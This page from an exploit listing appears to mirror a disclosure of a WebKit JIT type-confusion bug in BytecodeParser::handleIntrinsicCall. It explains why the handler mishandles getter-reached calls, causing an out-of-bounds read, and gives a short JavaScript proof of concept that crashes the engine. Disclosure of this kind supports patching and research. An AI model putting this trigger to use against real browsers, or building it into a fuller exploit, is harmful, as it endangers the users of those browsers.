Webkit jit bytecodeparser::handleintrinsiccall type confusion Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-11-29 | Type : dos | Platform : multiple
This exploit / vulnerability Webkit jit bytecodeparser::handleintrinsiccall type confusion is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

/*
case ArrayPushIntrinsic: {
...

if (static_cast<unsigned>(argumentCountIncludingThis) >= MIN_SPARSE_ARRAY_INDEX)
return false;

ArrayMode arrayMode = getArrayMode(m_currentInstruction[OPCODE_LENGTH(op_call) - 2].u.arrayProfile, Array::Write);

...
}

This code always assumes that the current instruction is an op_call instruction. But that code can be reached from op_get_by_id or op_get_by_val instructions using getters. As an op_get_by_val instruction is smaller than an op_call instruction in size, this also can lead to an OOB read.

Note that the handlers for ArraySliceIntrinsic, ArrayIndexOfIntrinsic and ArrayPopIntrinsic have the same pattern.

PoC:
*/

Array.prototype.__defineGetter__('a', Array.prototype.push);

function opt() {
let arr = new Array(1, 2, 3, 4);
arr['a' + ''];
}

for (let i = 0; i < 1000; i++) {
opt();
}

Webkit jit bytecodeparser::handleintrinsiccall type confusion


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Webkit jit bytecodeparser::handleintrinsiccall type confusion Vulnerability / Exploit